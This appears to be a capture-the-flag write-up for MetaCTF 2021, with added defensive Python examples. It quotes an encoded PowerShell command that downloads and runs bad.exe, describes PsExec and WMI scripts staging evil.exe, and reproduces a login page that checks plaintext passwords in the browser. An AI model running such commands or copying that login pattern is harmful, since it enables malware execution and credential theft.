MetaCTF 2021


A to Z (100 pts)

Tools: dCode

This encrypted flag will only require a simple substitution cipher to solve. Rearrange the letters from A to Z. yzhsufo_rh_nb_uze_wdziu

The string can be decoded using the Atbash cipher.

Thnks fr the Pwds (100 pts)

On a red team engagement, you discover a text file on an administrator’s desktop with all of their passwords - you now have the keys to the kingdom! During the engagement debrief, you explain what you found and how you were able to access so many systems. The administrator says that’s impossible, because they encrypted all of the passwords in the file. Here’s an example of one of their “encrypted” passwords: TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ== See if you’re able to recover the Administrator’s password.

This is a simple base64-encoded password, which can be decoded using:

echo "TWV0YUNURntlbmNvZGluZ19pc19OMFRfdGhlX3NhbWVfYXNfZW5jcnlwdGlvbiEhfQ==" | base64 --decode

Wrong Way on a One Way Street (100pts)

Hashing is a system by which information is encrypted such that it can never be decrypted… theoretically. Websites will often hash passwords so that if their passwords are ever leaked, bad actors won’t actually learn the user’s password; they’ll just get an encrypted form of it. However, the same password will always hash to the same ciphertext, so if the attacker can guess your password, they can figure out the hash. Can you guess the password for this hash? cb78e77e659c1648416cf5ac43fca4b65eeaefe1

Rather than attempting to brute-force the hash, let’s check it against a hash database. If we look up the hash on CrackStation, we can find the flag.
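Why a lookup site works on this kind of hash, and what stops it, as an added example that is not part of the original writeup. The word list, function names and PBKDF2 parameters are assumptions chosen for illustration.

```python
import hashlib
import hmac
import os

WORDLIST = ["letmein", "hunter2", "winter2021", "correct-horse"]  # constructed sample

def build_table(words):
    """Precompute SHA-1(word) -> word once; the table then works on any unsalted dump."""
    return {hashlib.sha1(w.encode()).hexdigest(): w for w in words}

def lookup(table, digest_hex):
    """Return the password for a known digest, or None when the table has no entry."""
    return table.get(digest_hex.strip().lower())

def hash_password(password, salt=None, rounds=200_000):
    """Per-user random salt plus a slow KDF: equal passwords no longer share a digest."""
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)

def verify_password(password, salt, expected, rounds=200_000):
    """Recompute with the stored salt and compare in constant time."""
    _, candidate = hash_password(password, salt, rounds)
    return hmac.compare_digest(candidate, expected)

if __name__ == "__main__":
    table = build_table(WORDLIST)
    leaked = hashlib.sha1(b"hunter2").hexdigest()       # unsalted, as in the challenge
    print("unsalted lookup:", lookup(table, leaked))
    salt, stored = hash_password("hunter2")
    print("salted lookup:  ", lookup(table, stored.hex()))
    print("login still ok: ", verify_password("hunter2", salt, stored))
```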


Magic in the Hex (100pts)

Sometimes in forensics, we run into files that have odd or unknown file extensions. In these cases, it’s helpful to look at some of the file format signatures to figure out what they are. We use something called “magic bytes” which are the first few bytes of a file. What is the ASCII representation of the magic bytes for a VMDK file? The flag format will be 3-4 letters (there are two correct answers).

We can take a look at the Wiki page for magic bytes, where we can find the magic bytes for VMDK files.

My Logs Know What You Did (125pts)

While investigating an incident, you identify a suspicious powershell command that was run on a compromised system … can you figure out what it was doing? C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -noP -sta -w 1 -enc TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUnv

The command being executed is PowerShell with a base64-encoded payload. Let’s decode it using:

echo "TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vTWV0YUNURntzdXBlcl9zdXNfc3Q0Z2luZ19zaXRlX2QwdF9jMG19L19iYWQuZXhlJywnYmFkLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ2JhZC5leGUn" | base64 --decode
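A triage helper for the same step, as an added example that is not part of the original writeup. PowerShell's -EncodedCommand normally carries base64 of UTF-16LE text, while the challenge string decodes as plain ASCII, so the helper handles both and tolerates a token with one stray trailing character. The function names and the sample command are assumptions.

```python
import base64
import re

# "-name <base64-looking argument>" pairs on a command line
ARG_RE = re.compile(r"\s-([A-Za-z]+)\s+([A-Za-z0-9+/]+={0,2})")

def is_encoded_command_flag(name):
    """PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...) and -ec."""
    name = name.lower()
    return name == "ec" or "encodedcommand".startswith(name)

def decode_encoded_command(cmdline):
    """Return the decoded script from a logged command line, or None if absent."""
    for match in ARG_RE.finditer(cmdline):
        if not is_encoded_command_flag(match.group(1)):
            continue
        token = match.group(2).rstrip("=")
        if len(token) % 4 == 1:          # impossible length: assume one stray trailing char
            token = token[:-1]
        token += "=" * (-len(token) % 4)  # restore padding
        raw = base64.b64decode(token)
        # UTF-16LE text of mostly ASCII characters has a NUL in every second byte
        if raw and len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
            return raw.decode("utf-16-le", errors="replace")
        return raw.decode("utf-8", errors="replace")
    return None

if __name__ == "__main__":
    sample = "Write-Output 'constructed!'"   # constructed sample command
    utf16 = base64.b64encode(sample.encode("utf-16-le")).decode()
    ascii_ = base64.b64encode(sample.encode()).decode()
    for line in (
        "powershell.exe -noP -sta -w 1 -enc " + utf16,
        "powershell.exe -noP -sta -w 1 -enc " + ascii_,
        "powershell.exe -w 1 -e " + ascii_ + "v",   # damaged copy
        "powershell.exe -ExecutionPolicy Bypass -File a.ps1",
    ):
        print(repr(decode_encoded_command(line)))
```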

I Just Wanna Run (150pts)

Our security team has identified evidence of ransomware deployment staging in the network. We’re trying to contain and remediate the malicious operator’s deployment staging and access before the operator successfully spreads and executes ransomware within the environment. We’ve recovered some of the operator’s staging scripts and files. Can you help identify which user account’s credentials the operator had compromised and is planning to use to execute the ransomware? The flag format will be METAL\xxxxx

First let’s extract Then, let’s analyze exe.bat, copy.bat, and wmi.bat.

  • wmi.bat uses WMI to create a new process which calls cmd /c COPY "\\share$\evil.exe" "C:\windows\temp\evil.exe"

  • copy.bat uses PsExec to call cmd /c COPY "\\share$\evil.exe" "C:\windows\temp\evil.exe"

  • exe.bat uses PsExec to call cmd /c c:\windows\temp\evil.exe

Therefore, the account that exe.bat uses to run its command is the account the operator plans to use to execute the malicious program.
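The same reasoning as a small triage script, as an added example that is not part of the original writeup. The script contents below are constructed stand-ins (hosts, accounts and passwords are invented); only the file names and the `cmd /c` payloads come from the writeup, and the function names are assumptions.

```python
import re

# Constructed stand-ins for the staging scripts: hosts, accounts and passwords are invented.
SCRIPTS = {
    "wmi.bat": r'''wmic /node:"HOST01" /user:"EXAMPLE\acct_a" /password:"x" process call create "cmd /c COPY \"\\share$\evil.exe\" \"C:\windows\temp\evil.exe\""''',
    "copy.bat": r'''psexec \\HOST01 -u EXAMPLE\acct_b -p x cmd /c COPY "\\share$\evil.exe" "C:\windows\temp\evil.exe"''',
    "exe.bat": r'''psexec \\HOST01 -u "EXAMPLE\acct_c" -p x cmd /c c:\windows\temp\evil.exe''',
}

# PsExec passes the account with -u, wmic with /user:
ACCOUNT_RE = re.compile(r'''(?:\s-u\s+|/user:)"?([^\s"]+)''', re.IGNORECASE)
# First word after "cmd /c" tells us what the remote command does
PAYLOAD_RE = re.compile(r"cmd\s+/c\s+(\S+)", re.IGNORECASE)

def triage(scripts):
    """Return (script, account, action) for every line that runs a remote command."""
    findings = []
    for name, body in scripts.items():
        for line in body.splitlines():
            account = ACCOUNT_RE.search(line)
            payload = PAYLOAD_RE.search(line)
            if not (account and payload):
                continue
            # COPY only stages the binary; anything else is treated as execution
            action = "stage" if payload.group(1).upper() == "COPY" else "execute"
            findings.append((name, account.group(1), action))
    return findings

def execution_accounts(scripts):
    """Accounts used on lines that execute the staged binary rather than copy it."""
    return sorted({acct for _, acct, action in triage(scripts) if action == "execute"})

if __name__ == "__main__":
    for row in triage(SCRIPTS):
        print(row)
    print("account to contain first:", execution_accounts(SCRIPTS))
```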

Sharing Files and Passwords (150pts)

Tools: Wireshark

FTP servers are made to share files, but if its communications are not encrypted, it might be sharing passwords as well. The password in this pcap to get the flag

All we have to do to obtain the flag is apply the filter ftp to show only FTP traffic. Then, we will see the ‘Request’ for the password, and the response to the user’s input.

Still Believe in Magic? (150pts)

We found an archive with a file in it, but there was no file extension so we’re not sure what it is. Can you figure out what kind of file it is and then open it?

We will extract magic.tar.gz using both gunzip and tar:

gunzip magic.tar.gz
tar -xvf magic.tar

Then, we can use file to figure out the file type.

file magic
>> magic: Zip archive data, at least v2.0 to extract, compression method=deflate

So magic is a zip archive. All we have to do is extract it to find the key.

mv magic magic.zip
unzip magic.zip
cat magic.txt
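What `file` is doing in this challenge, and the signature lookup from "Magic in the Hex", as an added example that is not part of the original writeup. It builds a constructed stand-in for magic.tar.gz in memory and unwraps it by content alone; the signature table is a short illustrative subset and the function names are assumptions.

```python
import gzip
import io
import tarfile
import zipfile

# (offset, signature, label): a short illustrative subset, not a complete database
SIGNATURES = [
    (0, b"\x1f\x8b", "gzip"),
    (0, b"PK\x03\x04", "zip"),
    (0, b"KDMV", "vmdk"),        # VMDK sparse-extent header
    (257, b"ustar", "tar"),      # tar keeps its magic at offset 257, not 0
]

def sniff(data):
    """Identify data by its magic bytes, ignoring any file name or extension."""
    for offset, sig, label in SIGNATURES:
        if data[offset:offset + len(sig)] == sig:
            return label
    return "unknown"

def build_sample():
    """Constructed stand-in for magic.tar.gz: gzip(tar(zip(magic.txt)))."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("magic.txt", "constructed-sample-contents")
    tbuf = io.BytesIO()
    with tarfile.open(fileobj=tbuf, mode="w") as t:
        info = tarfile.TarInfo("magic")          # no extension, as in the challenge
        info.size = len(zbuf.getvalue())
        t.addfile(info, io.BytesIO(zbuf.getvalue()))
    return gzip.compress(tbuf.getvalue())

def peel(data):
    """Unwrap layer by layer; return (detected types in order, innermost payload)."""
    seen = []
    while True:
        kind = sniff(data)
        seen.append(kind)
        if kind == "gzip":
            data = gzip.decompress(data)
        elif kind == "tar":
            with tarfile.open(fileobj=io.BytesIO(data)) as t:
                data = t.extractfile(t.getmembers()[0]).read()
        elif kind == "zip":
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                data = z.read(z.namelist()[0])
        else:
            return seen, data

if __name__ == "__main__":
    print(peel(build_sample()))
```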


There Are No Strings On Me (100pts)

We’ve got this program that’s supposed to check a password, and we’re not quite sure how it works. Could you take a look at it and see about finding the password it’s looking for?

The flag can be obtained by simply checking the strings of the file.

strings strings

Web Exploitation

Under Inspection (100pts)

Someone made this this for the Autobots to chat with each other. Seems like the Decepticons have found the site too and made accounts. One of the Autobot accounts has a flag that they’re trying to keep hidden from the Decepticons, can you figure out which account it is and steal it?

If we analyze the HTML contents of the webpage, there is a script in the head of the HTML.

function loginSubmission() {
	var username = document.getElementById("username").value;
	var password = document.getElementById("password").value;
	var result = document.getElementById("result");
	// Every account and its password is shipped to the browser in clear text
	var accounts = [
		{user: "Admin", pwd: "MetaCTF{super_secure_password}"},
		{user: "Bumblebee", pwd: "MetaCTF{sting_like_a_bee}"},
		{user: "Starscream", pwd: "MetaCTF{the_best_leader_of_the_decepticons}"},
		{user: "Jazz", pwd: "[redacted]"},
		{user: "Megatron", pwd: "MetaCTF{peace_through_tyranny}"},
	];
	// The credential check runs entirely client-side
	for(var a in accounts) {
		if(accounts[a].user == username && accounts[a].pwd == password) {
			if(username == "Jazz") {
				result.innerHTML = "Welcome, Jazz. The flag is " + password;
			} else {
				result.innerHTML = "Welcome, " + username + ".";
			}
			return false;
		}
	}
	result.innerHTML = "Login Failed. Please try again";
	return false;
}

Specifically, there is the check for username == "Jazz" which reveals the flag, so the flag is simply the password for user Jazz, which is found in the accounts[] array.


Sugar, We're Goin Up (125pts)

In September 2021, GitLab upgraded the CVSSv3 score for a critical remote code execution vulnerability to 10.0, the highest possible score. Although a patch was released in April, numerous public-facing, unpatched GitLab instances remain vulnerable. What is the CVE number for this critical, actively exploited vulnerability? The flag format will be CVE-XXXX-XXXX.

Finding the CVE requires some basic reconnaissance. We can simply search “GitLab CVE April 2021” and we will find the correct CVE.

The Best Laid Plans (200pts)

Sometimes, routers can break packets up into fragments to meet abnormal networking requirements, and the endpoint will be responsible for putting these back together. Sometimes however, this doesn’t go as planned, as Microsoft found out with CVE-2021-24074. We’d like to see the function responsible for this vulnerability, but we’re having some trouble finding its name… Could you see if you could find it?

If we look up the CVE on AttackerKB, we can find a technical analysis of the vulnerability. Specifically, gwillcox-r7 leaves a Proof of Concept for the CVE. This PoC exploits the function Ipv4pReceiveRoutingHeader in the tcpip stack. (For a further technical analysis, Armis has a detailed walkthrough on finding the vulnerability.)

We Broke the Printer (200pts)

Malicious operators typically exploit unpatched vulnerabilities within target environments to gain initial access, escalate privileges, and more. What recent vulnerability have Conti ransomware operators exploited to run arbitrary code with SYSTEM privileges? The flag format will be CVE-xxxx-xxxxx

I started by looking up ‘Conti ransomware CVE’. The first page is a Joint Cybersecurity Advisory posted by the DoD. In it, they mention three exploits used to push the Conti ransomware; one, ‘PrintNightmare’, exploits the Windows Print Spooler service. Hence the name of the challenge: the CVE of PrintNightmare is our flag.


This Ain't a Scene, It's an Encryption Race (100pts)

Ransomware attacks continue to negatively impact businesses around the world. What is the Mitre ATT&CK technique ID for the encryption of data in an environment to disrupt business operations? The flag format will be T####.

A simple search of “mitr attack technique id for encryption” will reveal the flag on MITRE’s “Data Encrypted for Impact” webpage.
